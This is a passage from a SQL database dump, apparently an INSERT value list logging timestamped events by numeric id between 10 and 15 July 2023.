00:43:26'),(79968,4960,1,'2023-07-10','2023-07-10 00:50:41'),(79969,4765,1,'2023-07-10','2023-07-10 01:48:09'),(79970,4938,1,'2023-07-10','2023-07-10 02:07:31'),(79971,4938,1,'2023-07-10','2023-07-10 02:22:28'),(79972,4759,1,'2023-07-10','2023-07-10 02:22:30'),(79973,4759,1,'2023-07-10','2023-07-10 02:37:28'),(79974,4963,1,'2023-07-10','2023-07-10 03:33:17'),(79975,4428,1,'2023-07-10','2023-07-10 03:58:02'),(79976,4765,1,'2023-07-10','2023-07-10 04:24:18'),(79977,3774,1,'2023-07-10','2023-07-10 06:03:12'),(79978,2296,1,'2023-07-10','2023-07-10 06:18:18'),(79979,4911,1,'2023-07-10','2023-07-10 09:21:16'),(79980,4747,1,'2023-07-10','2023-07-10 09:54:23'),(79981,4457,1,'2023-07-10','2023-07-10 10:09:34'),(79982,1745,1,'2023-07-10','2023-07-10 10:09:37'),(79983,4448,1,'2023-07-10','2023-07-10 10:09:42'),(79984,91,1,'2023-07-10','2023-07-10 10:49:45'),(79985,5264,1,'2023-07-10','2023-07-10 10:51:19'),(79986,5264,1,'2023-07-10','2023-07-10 10:51:22'),(79987,1745,1,'2023-07-10','2023-07-10 12:23:36'),(79988,4520,1,'2023-07-10','2023-07-10 12:24:34'),(79989,1610,1,'2023-07-10','2023-07-10 12:28:40'),(79990,4546,1,'2023-07-10','2023-07-10 12:33:46'),(79991,3664,1,'2023-07-10','2023-07-10 13:08:36'),(79992,4938,1,'2023-07-10','2023-07-10 13:10:39'),(79993,4759,1,'2023-07-10','2023-07-10 13:51:40'),(79994,1594,1,'2023-07-10','2023-07-10 14:05:30'),(79995,4759,1,'2023-07-10','2023-07-10 14:14:18'),(79996,4238,1,'2023-07-10','2023-07-10 14:19:21'),(79997,4326,1,'2023-07-10','2023-07-10 14:33:14'),(79998,5334,1,'2023-07-10','2023-07-10 14:36:26'),(79999,4747,1,'2023-07-10','2023-07-10 14:59:37'),(80000,1612,1,'2023-07-10','2023-07-10 15:04:11'),(80001,4457,1,'2023-07-10','2023-07-10 15:04:53'),(80002,1728,1,'2023-07-10','2023-07-10 15:16:01'),(80003,4338,1,'2023-07-10','2023-07-10 15:19:12'),(80004,4448,1,'2023-07-10','2023-07-10 15:31:01'),(80005,1594,1,'2023-07-10','2023-07-10 15:34:14'),(80006,3030,1,'2023-07-10','2023-07-10 15:46:35'),(80007,72,1,'2023-07-10','2023-07-10 15:52:34'),(80008,4485,1,'2023-07-10','2023-07-10 15:53:31'),(80009,1872,1,'2023-07-10','2023-07-10 16:01:03'),(80010,3079,1,'2023-07-10','2023-07-10 16:19:10'),(80011,474,1,'2023-07-10','2023-07-10 16:31:04'),(80012,3710,1,'2023-07-10','2023-07-10 16:45:13'),(80013,5259,1,'2023-07-10','2023-07-10 16:46:03'),(80014,4911,1,'2023-07-10','2023-07-10 17:00:26'),(80015,76,1,'2023-07-10','2023-07-10 17:02:45'),(80016,2964,1,'2023-07-10','2023-07-10 17:04:27'),(80017,474,1,'2023-07-10','2023-07-10 17:07:33'),(80018,473,1,'2023-07-10','2023-07-10 17:16:05'),(80019,89,1,'2023-07-10','2023-07-10 17:19:13'),(80020,4944,1,'2023-07-10','2023-07-10 17:50:43'),(80021,72,1,'2023-07-10','2023-07-10 18:12:36'),(80022,5042,1,'2023-07-10','2023-07-10 18:16:12'),(80023,4416,1,'2023-07-10','2023-07-10 18:22:07'),(80024,1695,1,'2023-07-10','2023-07-10 18:22:09'),(80025,4977,1,'2023-07-10','2023-07-10 18:30:32'),(80026,3180,1,'2023-07-10','2023-07-10 18:37:31'),(80027,3498,1,'2023-07-10','2023-07-10 18:53:38'),(80028,468,1,'2023-07-10','2023-07-10 19:16:39'),(80029,1608,1,'2023-07-10','2023-07-10 19:17:25'),(80030,4944,1,'2023-07-10','2023-07-10 19:35:42'),(80031,87,1,'2023-07-10','2023-07-10 19:36:06'),(80032,4326,1,'2023-07-10','2023-07-10 19:36:25'),(80033,4930,1,'2023-07-10','2023-07-10 19:36:33'),(80034,91,1,'2023-07-10','2023-07-10 19:36:58'),(80035,4741,1,'2023-07-10','2023-07-10 19:37:33'),(80036,1745,1,'2023-07-10','2023-07-10 19:39:40'),(80037,1749,1,'2023-07-10','2023-07-10 19:40:46'),(80038,5005,1,'2023-07-10','2023-07-10 19:40:48'),(80039,4930,1,'2023-07-10','2023-07-10 19:49:38'),(80040,72,1,'2023-07-10','2023-07-10 20:22:40'),(80041,2457,1,'2023-07-10','2023-07-10 20:30:18'),(80042,468,1,'2023-07-10','2023-07-10 21:07:33'),(80043,4338,1,'2023-07-10','2023-07-10 22:16:47'),(80044,4408,1,'2023-07-10','2023-07-10 22:22:31'),(80045,84,1,'2023-07-10','2023-07-10 23:35:25'),(80046,2964,1,'2023-07-11','2023-07-11 01:45:04'),(80047,4759,1,'2023-07-11','2023-07-11 03:07:33'),(80048,5256,1,'2023-07-11','2023-07-11 03:07:39'),(80049,84,1,'2023-07-11','2023-07-11 03:26:16'),(80050,4759,1,'2023-07-11','2023-07-11 03:52:35'),(80051,5256,1,'2023-07-11','2023-07-11 03:52:39'),(80052,1594,1,'2023-07-11','2023-07-11 04:56:18'),(80053,4944,1,'2023-07-11','2023-07-11 05:37:28'),(80054,5326,1,'2023-07-11','2023-07-11 05:38:16'),(80055,4977,1,'2023-07-11','2023-07-11 05:51:33'),(80056,468,1,'2023-07-11','2023-07-11 06:20:05'),(80057,3090,1,'2023-07-11','2023-07-11 06:51:35'),(80058,1596,1,'2023-07-11','2023-07-11 08:16:00'),(80059,4911,1,'2023-07-11','2023-07-11 08:16:52'),(80060,4911,1,'2023-07-11','2023-07-11 08:20:15'),(80061,4911,1,'2023-07-11','2023-07-11 08:39:31'),(80062,5113,1,'2023-07-11','2023-07-11 08:44:07'),(80063,1582,1,'2023-07-11','2023-07-11 09:00:40'),(80064,4911,1,'2023-07-11','2023-07-11 09:02:29'),(80065,4911,1,'2023-07-11','2023-07-11 09:39:29'),(80066,1870,1,'2023-07-11','2023-07-11 10:44:05'),(80067,473,1,'2023-07-11','2023-07-11 10:44:10'),(80068,487,1,'2023-07-11','2023-07-11 11:22:12'),(80069,473,1,'2023-07-11','2023-07-11 11:22:12'),(80070,4911,1,'2023-07-11','2023-07-11 11:31:12'),(80071,4911,1,'2023-07-11','2023-07-11 11:31:39'),(80072,1594,1,'2023-07-11','2023-07-11 11:47:22'),(80073,1596,1,'2023-07-11','2023-07-11 11:47:50'),(80074,1594,1,'2023-07-11','2023-07-11 11:48:04'),(80075,3004,1,'2023-07-11','2023-07-11 12:25:55'),(80076,1606,1,'2023-07-11','2023-07-11 13:20:22'),(80077,4759,1,'2023-07-11','2023-07-11 13:44:46'),(80078,4966,1,'2023-07-11','2023-07-11 13:45:05'),(80079,473,1,'2023-07-11','2023-07-11 13:52:08'),(80080,4759,1,'2023-07-11','2023-07-11 14:01:08'),(80081,1602,1,'2023-07-11','2023-07-11 14:06:29'),(80082,2178,1,'2023-07-11','2023-07-11 14:08:03'),(80083,1722,1,'2023-07-11','2023-07-11 14:18:02'),(80084,3034,1,'2023-07-11','2023-07-11 14:19:21'),(80085,1602,1,'2023-07-11','2023-07-11 14:30:37'),(80086,3735,1,'2023-07-11','2023-07-11 14:43:38'),(80087,5253,1,'2023-07-11','2023-07-11 14:50:23'),(80088,4759,1,'2023-07-11','2023-07-11 15:07:19'),(80089,4911,1,'2023-07-11','2023-07-11 15:07:55'),(80090,1602,1,'2023-07-11','2023-07-11 15:28:29'),(80091,4930,1,'2023-07-11','2023-07-11 15:44:54'),(80092,4966,1,'2023-07-11','2023-07-11 15:51:01'),(80093,5253,1,'2023-07-11','2023-07-11 15:58:12'),(80094,4911,1,'2023-07-11','2023-07-11 16:07:02'),(80095,4911,1,'2023-07-11','2023-07-11 16:07:51'),(80096,4960,1,'2023-07-11','2023-07-11 16:11:41'),(80097,468,1,'2023-07-11','2023-07-11 16:13:43'),(80098,5080,1,'2023-07-11','2023-07-11 16:16:11'),(80099,473,1,'2023-07-11','2023-07-11 16:23:04'),(80100,1602,1,'2023-07-11','2023-07-11 16:36:04'),(80101,4977,1,'2023-07-11','2023-07-11 16:50:55'),(80102,468,1,'2023-07-11','2023-07-11 17:42:13'),(80103,4966,1,'2023-07-11','2023-07-11 18:17:18'),(80104,1722,1,'2023-07-11','2023-07-11 19:09:40'),(80105,4911,1,'2023-07-11','2023-07-11 19:23:03'),(80106,3531,1,'2023-07-11','2023-07-11 19:55:06'),(80107,4768,1,'2023-07-11','2023-07-11 20:42:31'),(80108,4960,1,'2023-07-11','2023-07-11 20:45:26'),(80109,72,1,'2023-07-11','2023-07-11 21:03:01'),(80110,1596,1,'2023-07-11','2023-07-11 21:13:38'),(80111,1766,1,'2023-07-11','2023-07-11 21:33:25'),(80112,4911,1,'2023-07-11','2023-07-11 21:47:21'),(80113,4911,1,'2023-07-11','2023-07-11 22:59:49'),(80114,5271,1,'2023-07-12','2023-07-12 00:30:12'),(80115,2293,1,'2023-07-12','2023-07-12 01:11:48'),(80116,4878,1,'2023-07-12','2023-07-12 03:00:27'),(80117,2293,1,'2023-07-12','2023-07-12 03:26:50'),(80118,4759,1,'2023-07-12','2023-07-12 04:29:50'),(80119,4510,1,'2023-07-12','2023-07-12 05:09:17'),(80120,4759,1,'2023-07-12','2023-07-12 05:59:50'),(80121,1699,1,'2023-07-12','2023-07-12 06:31:11'),(80122,4750,1,'2023-07-12','2023-07-12 06:43:47'),(80123,4709,1,'2023-07-12','2023-07-12 06:56:32'),(80124,1594,1,'2023-07-12','2023-07-12 07:17:42'),(80125,80,1,'2023-07-12','2023-07-12 08:14:49'),(80126,1598,1,'2023-07-12','2023-07-12 08:58:55'),(80127,4977,1,'2023-07-12','2023-07-12 09:49:35'),(80128,473,1,'2023-07-12','2023-07-12 10:19:59'),(80129,487,1,'2023-07-12','2023-07-12 10:23:10'),(80130,473,1,'2023-07-12','2023-07-12 10:23:10'),(80131,89,1,'2023-07-12','2023-07-12 10:51:27'),(80132,1594,1,'2023-07-12','2023-07-12 11:02:35'),(80133,1877,1,'2023-07-12','2023-07-12 11:38:12'),(80134,473,1,'2023-07-12','2023-07-12 11:38:12'),(80135,1728,1,'2023-07-12','2023-07-12 11:49:45'),(80136,473,1,'2023-07-12','2023-07-12 11:52:45'),(80137,5256,1,'2023-07-12','2023-07-12 11:55:13'),(80138,473,1,'2023-07-12','2023-07-12 11:55:15'),(80139,473,1,'2023-07-12','2023-07-12 11:55:24'),(80140,4674,1,'2023-07-12','2023-07-12 11:56:55'),(80141,473,1,'2023-07-12','2023-07-12 11:58:22'),(80142,487,1,'2023-07-12','2023-07-12 11:58:54'),(80143,473,1,'2023-07-12','2023-07-12 11:58:55'),(80144,5256,1,'2023-07-12','2023-07-12 12:04:06'),(80145,5046,1,'2023-07-12','2023-07-12 12:23:59'),(80146,4911,1,'2023-07-12','2023-07-12 12:57:20'),(80147,1877,1,'2023-07-12','2023-07-12 13:13:23'),(80148,2457,1,'2023-07-12','2023-07-12 13:25:46'),(80149,80,1,'2023-07-12','2023-07-12 13:26:23'),(80150,2457,1,'2023-07-12','2023-07-12 13:27:04'),(80151,4759,1,'2023-07-12','2023-07-12 13:33:00'),(80152,1604,1,'2023-07-12','2023-07-12 13:51:01'),(80153,4420,1,'2023-07-12','2023-07-12 14:08:29'),(80154,1774,1,'2023-07-12','2023-07-12 14:14:01'),(80155,4911,1,'2023-07-12','2023-07-12 14:17:21'),(80156,4911,1,'2023-07-12','2023-07-12 14:18:25'),(80157,4674,1,'2023-07-12','2023-07-12 14:25:56'),(80158,5343,1,'2023-07-12','2023-07-12 14:43:25'),(80159,4911,1,'2023-07-12','2023-07-12 14:43:40'),(80160,4911,1,'2023-07-12','2023-07-12 14:44:46'),(80161,4911,1,'2023-07-12','2023-07-12 14:46:20'),(80162,4911,1,'2023-07-12','2023-07-12 14:50:25'),(80163,5046,1,'2023-07-12','2023-07-12 15:13:36'),(80164,3691,1,'2023-07-12','2023-07-12 15:30:38'),(80165,473,1,'2023-07-12','2023-07-12 15:50:56'),(80166,487,1,'2023-07-12','2023-07-12 15:50:56'),(80167,4911,1,'2023-07-12','2023-07-12 16:38:03'),(80168,4911,1,'2023-07-12','2023-07-12 16:43:12'),(80169,4759,1,'2023-07-12','2023-07-12 17:07:04'),(80170,4930,1,'2023-07-12','2023-07-12 17:09:50'),(80171,91,1,'2023-07-12','2023-07-12 17:10:50'),(80172,467,1,'2023-07-12','2023-07-12 17:11:26'),(80173,76,1,'2023-07-12','2023-07-12 17:13:13'),(80174,87,1,'2023-07-12','2023-07-12 17:17:51'),(80175,91,1,'2023-07-12','2023-07-12 17:18:10'),(80176,5259,1,'2023-07-12','2023-07-12 17:18:29'),(80177,2751,1,'2023-07-12','2023-07-12 17:20:47'),(80178,4485,1,'2023-07-12','2023-07-12 17:22:25'),(80179,5264,1,'2023-07-12','2023-07-12 17:58:25'),(80180,91,1,'2023-07-12','2023-07-12 18:53:59'),(80181,91,1,'2023-07-12','2023-07-12 19:49:57'),(80182,4938,1,'2023-07-12','2023-07-12 19:52:33'),(80183,4911,1,'2023-07-12','2023-07-12 20:24:54'),(80184,89,1,'2023-07-12','2023-07-12 20:34:51'),(80185,3083,1,'2023-07-12','2023-07-12 20:43:19'),(80186,4911,1,'2023-07-12','2023-07-12 21:06:48'),(80187,1877,1,'2023-07-12','2023-07-12 21:47:00'),(80188,1588,1,'2023-07-13','2023-07-13 00:36:36'),(80189,4938,1,'2023-07-13','2023-07-13 01:55:42'),(80190,1588,1,'2023-07-13','2023-07-13 01:56:33'),(80191,4938,1,'2023-07-13','2023-07-13 02:07:58'),(80192,4524,1,'2023-07-13','2023-07-13 02:10:04'),(80193,4759,1,'2023-07-13','2023-07-13 02:40:12'),(80194,1544,1,'2023-07-13','2023-07-13 02:40:17'),(80195,1705,1,'2023-07-13','2023-07-13 02:45:09'),(80196,5280,1,'2023-07-13','2023-07-13 02:52:56'),(80197,4963,1,'2023-07-13','2023-07-13 03:15:29'),(80198,4637,1,'2023-07-13','2023-07-13 03:25:17'),(80199,1604,1,'2023-07-13','2023-07-13 03:29:58'),(80200,102,1,'2023-07-13','2023-07-13 03:45:21'),(80201,4960,1,'2023-07-13','2023-07-13 03:58:28'),(80202,89,1,'2023-07-13','2023-07-13 03:59:49'),(80203,4960,1,'2023-07-13','2023-07-13 04:00:33'),(80204,4747,1,'2023-07-13','2023-07-13 04:13:49'),(80205,102,1,'2023-07-13','2023-07-13 04:14:49'),(80206,4963,1,'2023-07-13','2023-07-13 04:28:30'),(80207,108,1,'2023-07-13','2023-07-13 04:45:33'),(80208,4706,1,'2023-07-13','2023-07-13 04:50:59'),(80209,2813,1,'2023-07-13','2023-07-13 04:53:02'),(80210,89,1,'2023-07-13','2023-07-13 04:53:20'),(80211,2804,1,'2023-07-13','2023-07-13 05:11:48'),(80212,1588,1,'2023-07-13','2023-07-13 05:27:32'),(80213,108,1,'2023-07-13','2023-07-13 05:30:32'),(80214,335,1,'2023-07-13','2023-07-13 05:42:14'),(80215,335,1,'2023-07-13','2023-07-13 06:02:31'),(80216,4911,1,'2023-07-13','2023-07-13 07:33:52'),(80217,3706,1,'2023-07-13','2023-07-13 09:24:16'),(80218,2309,1,'2023-07-13','2023-07-13 09:43:43'),(80219,68,1,'2023-07-13','2023-07-13 09:52:32'),(80220,469,1,'2023-07-13','2023-07-13 10:09:25'),(80221,4960,1,'2023-07-13','2023-07-13 10:22:36'),(80222,4960,1,'2023-07-13','2023-07-13 10:28:05'),(80223,4960,1,'2023-07-13','2023-07-13 10:28:48'),(80224,4412,1,'2023-07-13','2023-07-13 10:30:31'),(80225,4911,1,'2023-07-13','2023-07-13 10:44:14'),(80226,4966,1,'2023-07-13','2023-07-13 11:19:45'),(80227,2658,1,'2023-07-13','2023-07-13 11:54:23'),(80228,2658,1,'2023-07-13','2023-07-13 11:58:21'),(80229,1602,1,'2023-07-13','2023-07-13 12:01:35'),(80230,4529,1,'2023-07-13','2023-07-13 12:09:05'),(80231,4911,1,'2023-07-13','2023-07-13 12:13:22'),(80232,4911,1,'2023-07-13','2023-07-13 12:13:43'),(80233,4747,1,'2023-07-13','2023-07-13 12:24:02'),(80234,469,1,'2023-07-13','2023-07-13 12:39:02'),(80235,3706,1,'2023-07-13','2023-07-13 12:54:06'),(80236,468,1,'2023-07-13','2023-07-13 12:54:08'),(80237,4911,1,'2023-07-13','2023-07-13 13:19:45'),(80238,4911,1,'2023-07-13','2023-07-13 14:18:46'),(80239,2178,1,'2023-07-13','2023-07-13 14:23:46'),(80240,2178,1,'2023-07-13','2023-07-13 14:24:58'),(80241,4765,1,'2023-07-13','2023-07-13 14:44:09'),(80242,5334,1,'2023-07-13','2023-07-13 14:44:57'),(80243,4759,1,'2023-07-13','2023-07-13 14:52:09'),(80244,1770,1,'2023-07-13','2023-07-13 14:57:03'),(80245,468,1,'2023-07-13','2023-07-13 15:04:23'),(80246,2904,1,'2023-07-13','2023-07-13 15:17:17'),(80247,2558,1,'2023-07-13','2023-07-13 15:33:50'),(80248,2395,1,'2023-07-13','2023-07-13 15:55:07'),(80249,3486,1,'2023-07-13','2023-07-13 15:55:14'),(80250,5062,1,'2023-07-13','2023-07-13 16:02:07'),(80251,473,1,'2023-07-13','2023-07-13 16:11:13'),(80252,5271,1,'2023-07-13','2023-07-13 16:32:56'),(80253,3486,1,'2023-07-13','2023-07-13 16:42:47'),(80254,2558,1,'2023-07-13','2023-07-13 16:46:34'),(80255,3724,1,'2023-07-13','2023-07-13 16:58:15'),(80256,1594,1,'2023-07-13','2023-07-13 17:01:38'),(80257,3127,1,'2023-07-13','2023-07-13 17:34:15'),(80258,1544,1,'2023-07-13','2023-07-13 17:53:06'),(80259,4911,1,'2023-07-13','2023-07-13 17:58:22'),(80260,1610,1,'2023-07-13','2023-07-13 18:03:25'),(80261,4759,1,'2023-07-13','2023-07-13 18:08:04'),(80262,473,1,'2023-07-13','2023-07-13 18:10:57'),(80263,3178,1,'2023-07-13','2023-07-13 18:36:07'),(80264,1612,1,'2023-07-13','2023-07-13 18:48:26'),(80265,473,1,'2023-07-13','2023-07-13 18:56:05'),(80266,473,1,'2023-07-13','2023-07-13 18:56:06'),(80267,4529,1,'2023-07-13','2023-07-13 19:01:17'),(80268,468,1,'2023-07-13','2023-07-13 19:44:06'),(80269,468,1,'2023-07-13','2023-07-13 19:44:07'),(80270,1870,1,'2023-07-13','2023-07-13 19:59:04'),(80271,1870,1,'2023-07-13','2023-07-13 19:59:06'),(80272,5271,1,'2023-07-13','2023-07-13 20:26:04'),(80273,5271,1,'2023-07-13','2023-07-13 20:26:08'),(80274,4747,1,'2023-07-13','2023-07-13 20:50:06'),(80275,4747,1,'2023-07-13','2023-07-13 20:50:08'),(80276,3090,1,'2023-07-13','2023-07-13 20:53:07'),(80277,4750,1,'2023-07-13','2023-07-13 21:02:05'),(80278,4750,1,'2023-07-13','2023-07-13 21:02:06'),(80279,89,1,'2023-07-13','2023-07-13 21:20:08'),(80280,89,1,'2023-07-13','2023-07-13 21:20:12'),(80281,4930,1,'2023-07-13','2023-07-13 21:38:10'),(80282,4930,1,'2023-07-13','2023-07-13 21:38:12'),(80283,68,1,'2023-07-14','2023-07-14 01:16:30'),(80284,1612,1,'2023-07-14','2023-07-14 01:46:17'),(80285,3764,1,'2023-07-14','2023-07-14 02:30:38'),(80286,2809,1,'2023-07-14','2023-07-14 02:32:49'),(80287,335,1,'2023-07-14','2023-07-14 02:41:10'),(80288,472,1,'2023-07-14','2023-07-14 03:13:22'),(80289,3297,1,'2023-07-14','2023-07-14 03:20:31'),(80290,469,1,'2023-07-14','2023-07-14 03:28:38'),(80291,4785,1,'2023-07-14','2023-07-14 05:23:43'),(80292,4454,1,'2023-07-14','2023-07-14 05:39:54'),(80293,4412,1,'2023-07-14','2023-07-14 05:40:09'),(80294,1582,1,'2023-07-14','2023-07-14 05:40:39'),(80295,1602,1,'2023-07-14','2023-07-14 05:45:08'),(80296,2911,1,'2023-07-14','2023-07-14 05:50:43'),(80297,1594,1,'2023-07-14','2023-07-14 05:59:55'),(80298,1602,1,'2023-07-14','2023-07-14 06:04:19'),(80299,5356,1,'2023-07-14','2023-07-14 06:18:46'),(80300,1598,1,'2023-07-14','2023-07-14 06:28:37'),(80301,1602,1,'2023-07-14','2023-07-14 06:29:42'),(80302,89,1,'2023-07-14','2023-07-14 06:31:10'),(80303,89,1,'2023-07-14','2023-07-14 06:32:45'),(80304,89,1,'2023-07-14','2023-07-14 06:33:54'),(80305,89,1,'2023-07-14','2023-07-14 06:34:24'),(80306,91,1,'2023-07-14','2023-07-14 06:35:10'),(80307,4546,1,'2023-07-14','2023-07-14 06:46:51'),(80308,91,1,'2023-07-14','2023-07-14 06:47:27'),(80309,5080,1,'2023-07-14','2023-07-14 06:50:32'),(80310,2904,1,'2023-07-14','2023-07-14 06:53:31'),(80311,4448,1,'2023-07-14','2023-07-14 07:02:33'),(80312,1728,1,'2023-07-14','2023-07-14 07:04:02'),(80313,4387,1,'2023-07-14','2023-07-14 07:10:15'),(80314,4759,1,'2023-07-14','2023-07-14 07:11:24'),(80315,5356,1,'2023-07-14','2023-07-14 07:18:14'),(80316,1614,1,'2023-07-14','2023-07-14 07:18:46'),(80317,1699,1,'2023-07-14','2023-07-14 07:22:39'),(80318,1582,1,'2023-07-14','2023-07-14 07:31:30'),(80319,1600,1,'2023-07-14','2023-07-14 07:41:32'),(80320,4332,1,'2023-07-14','2023-07-14 07:56:40'),(80321,3691,1,'2023-07-14','2023-07-14 08:02:58'),(80322,3764,1,'2023-07-14','2023-07-14 08:08:41'),(80323,1582,1,'2023-07-14','2023-07-14 08:18:32'),(80324,2775,1,'2023-07-14','2023-07-14 08:23:38'),(80325,2911,1,'2023-07-14','2023-07-14 08:32:58'),(80326,1728,1,'2023-07-14','2023-07-14 08:47:51'),(80327,2617,1,'2023-07-14','2023-07-14 09:01:24'),(80328,1872,1,'2023-07-14','2023-07-14 09:01:33'),(80329,1584,1,'2023-07-14','2023-07-14 09:09:00'),(80330,2617,1,'2023-07-14','2023-07-14 09:35:11'),(80331,4622,1,'2023-07-14','2023-07-14 09:37:07'),(80332,3316,1,'2023-07-14','2023-07-14 09:40:45'),(80333,3479,1,'2023-07-14','2023-07-14 09:58:11'),(80334,3664,1,'2023-07-14','2023-07-14 10:45:04'),(80335,1598,1,'2023-07-14','2023-07-14 10:54:42'),(80336,2911,1,'2023-07-14','2023-07-14 12:24:24'),(80337,110,1,'2023-07-14','2023-07-14 12:48:51'),(80338,5259,1,'2023-07-14','2023-07-14 12:57:32'),(80339,4911,1,'2023-07-14','2023-07-14 13:13:25'),(80340,1596,1,'2023-07-14','2023-07-14 13:33:55'),(80341,1592,1,'2023-07-14','2023-07-14 13:34:08'),(80342,76,1,'2023-07-14','2023-07-14 13:54:32'),(80343,1612,1,'2023-07-14','2023-07-14 14:03:38'),(80344,4722,1,'2023-07-14','2023-07-14 14:17:21'),(80345,4938,1,'2023-07-14','2023-07-14 14:24:20'),(80346,91,1,'2023-07-14','2023-07-14 14:31:32'),(80347,91,1,'2023-07-14','2023-07-14 14:31:34'),(80348,2911,1,'2023-07-14','2023-07-14 14:39:22'),(80349,5122,1,'2023-07-14','2023-07-14 14:44:34'),(80350,91,1,'2023-07-14','2023-07-14 14:45:04'),(80351,1596,1,'2023-07-14','2023-07-14 15:00:12'),(80352,3092,1,'2023-07-14','2023-07-14 15:11:09'),(80353,1588,1,'2023-07-14','2023-07-14 15:23:52'),(80354,1766,1,'2023-07-14','2023-07-14 15:49:34'),(80355,4323,1,'2023-07-14','2023-07-14 16:01:18'),(80356,4323,1,'2023-07-14','2023-07-14 16:15:23'),(80357,3781,1,'2023-07-14','2023-07-14 16:28:08'),(80358,1732,1,'2023-07-14','2023-07-14 16:53:49'),(80359,4963,1,'2023-07-14','2023-07-14 16:56:07'),(80360,4412,1,'2023-07-14','2023-07-14 17:13:20'),(80361,4412,1,'2023-07-14','2023-07-14 17:19:39'),(80362,3102,1,'2023-07-14','2023-07-14 17:44:12'),(80363,2813,1,'2023-07-14','2023-07-14 17:55:18'),(80364,3706,1,'2023-07-14','2023-07-14 17:59:23'),(80365,470,1,'2023-07-14','2023-07-14 18:04:51'),(80366,3030,1,'2023-07-14','2023-07-14 18:18:57'),(80367,468,1,'2023-07-14','2023-07-14 18:24:49'),(80368,4485,1,'2023-07-14','2023-07-14 18:29:26'),(80369,2617,1,'2023-07-14','2023-07-14 19:01:24'),(80370,2293,1,'2023-07-14','2023-07-14 19:09:41'),(80371,4960,1,'2023-07-14','2023-07-14 19:14:23'),(80372,5334,1,'2023-07-14','2023-07-14 19:29:44'),(80373,5264,1,'2023-07-14','2023-07-14 19:49:04'),(80374,2617,1,'2023-07-14','2023-07-14 19:58:04'),(80375,4485,1,'2023-07-14','2023-07-14 19:59:22'),(80376,1606,1,'2023-07-14','2023-07-14 20:26:23'),(80377,4938,1,'2023-07-14','2023-07-14 21:24:27'),(80378,5320,1,'2023-07-14','2023-07-14 21:37:11'),(80379,5289,1,'2023-07-14','2023-07-14 23:02:12'),(80380,5163,1,'2023-07-14','2023-07-14 23:44:05'),(80381,4971,1,'2023-07-14','2023-07-14 23:45:23'),(80382,4556,1,'2023-07-14','2023-07-14 23:54:43'),(80383,3764,1,'2023-07-14','2023-07-14 23:54:55'),(80384,472,1,'2023-07-14','2023-07-14 23:56:02'),(80385,5356,1,'2023-07-15','2023-07-15 00:15:03'),(80386,4444,1,'2023-07-15','2023-07-15 00:41:51'),(80387,1614,1,'2023-07-15','2023-07-15 00:49:43'),(80388,3102,1,'2023-07-15','2023-07-15 01:11:09'),(80389,1766,1,'2023-07-15','2023-07-15 01:28:19'),(80390,3045,1,'2023-07-15','2023-07-15 01:39:47'),(80391,4412,1,'2023-07-15','2023-07-15 01:47:21'),(80392,2420,1,'2023-07-15','2023-07-15 01:51:20'),(80393,1870,1,'2023-07-15','2023-07-15 01:52:13'),(80394,4966,1,'2023-07-15','2023-07-15 01:57:48'),(80395,3096,1,'2023-07-15','2023-07-15 02:08:02'),(80396,1594,1,'2023-07-15','2023-07-15 02:09:22'),(80397,1718,1,'2023-07-15','2023-07-15 02:14:10'),(80398,4703,1,'2023-07-15','2023-07-15 02:16:00'),(80399,4756,1,'2023-07-15','2023-07-15 02:24:48'),(80400,1582,1,'2023-07-15','2023-07-15 02:32:17'),(80401,5289,1,'2023-07-15','2023-07-15 02:44:34'),(80402,3251,1,'2023-07-15','2023-07-15 02:48:36'),(80403,1610,1,'2023-07-15','2023-07-15 02:49:33'),(80404,1600,1,'2023-07-15','2023-07-15 02:55:10'),(80405,1745,1,'2023-07-15','2023-07-15 02:55:11'),(80406,1745,1,'2023-07-15','2023-07-15 02:55:15'),(80407,1600,1,'2023-07-15','2023-07-15 02:55:16'),(80408,1774,1,'2023-07-15','2023-07-15 03:02:00'),(80409,1703,1,'2023-07-15','2023-07-15 03:08:59'),(80410,4938,1,'2023-07-15','2023-07-15 03:10:39'),(80411,4759,1,'2023-07-15','2023-07-15 03:11:01'),(80412,3430,1,'2023-07-15','2023-07-15 03:13:18'),(80413,3664,1,'2023-07-15','2023-07-15 03:17:43'),(80414,469,1,'2023-07-15','2023-07-15 03:17:47'),(80415,5256,1,'2023-07-15','2023-07-15 03:17:52'),(80416,3721,1,'2023-07-15','2023-07-15 03:18:00'),(80417,478,1,'2023-07-15','2023-07-15 03:21:50'),(80418,5256,1,'2023-07-15','2023-07-15 03:33:08'),(80419,4759,1,'2023-07-15','2023-07-15 03:39:53'),(80420,4866,1,'2023-07-15','2023-07-15 03:39:55'),(80421,5280,1,'2023-07-15','2023-07-15 03:44:08'),(80422,2248,1,'2023-07-15','2023-07-15 03:54:11'),(80423,1586,1,'2023-07-15','2023-07-15 04:01:37'),(80424,2617,1,'2023-07-15','2023-07-15 04:12:41'),(80425,76,1,'2023-07-15','2023-07-15 04:24:30'),(80426,2457,1,'2023-07-15','2023-07-15 04:42:52'),(80427,80,1,'2023-07-15','2023-07-15 04:43:01'),(80428,1703,1,'2023-07-15','2023-07-15 04:47:24'),(80429,1600,1,'2023-07-15','2023-07-15 05:01:10'),(80430,4759,1,'2023-07-15','2023-07-15 05:03:10'),(80431,4556,1,'2023-07-15','2023-07-15 05:15:54'),(80432,2658,1,'2023-07-15','2023-07-15 05:22:24'),(80433,4842,1,'2023-07-15','2023-07-15 05:31:45'),(80434,1588,1,'2023-07-15','2023-07-15 05:34:39'),(80435,1600,1,'2023-07-15','2023-07-15 06:08:36'),(80436,1600,1,'2023-07-15','2023-07-15 06:08:42'),(80437,1600,1,'2023-07-15','2023-07-15 06:09:32'),(80438,2248,1,'2023-07-15','2023-07-15 06:11:18'),(80439,3781,1,'2023-07-15','2023-07-15 06:11:50'),(80440,2248,1,'2023-07-15','2023-07-15 06:13:02'),(80441,3781,1,'2023-07-15','2023-07-15 06:14:53'),(80442,3746,1,'2023-07-15','2023-07-15 06:36:15'),(80443,4911,1,'2023-07-15','2023-07-15 07:26:29'),(80444,1602,1,'2023-07-15','2023-07-15 07:30:49'),(80445,2775,1,'2023-07-15','2023-07-15 08:20:02'),(80446,4911,1,'2023-07-15','2023-07-15 08:48:18'),(80447,2809,1,'2023-07-15','2023-07-15 08:51:16'),(80448,2809,1,'2023-07-15','2023-07-15 08:52:19'),(80449,4950,1,'2023-07-15','2023-07-15 09:30:48'),(80450,1594,1,'2023-07-15','2023-07-15 09:45:00'),(80451,3229,1,'2023-07-15','2023-07-15 09:55:00'),(80452,3691,1,'2023-07-15','2023-07-15 09:59:12'),(80453,1596,1,'2023-07-15','2023-07-15 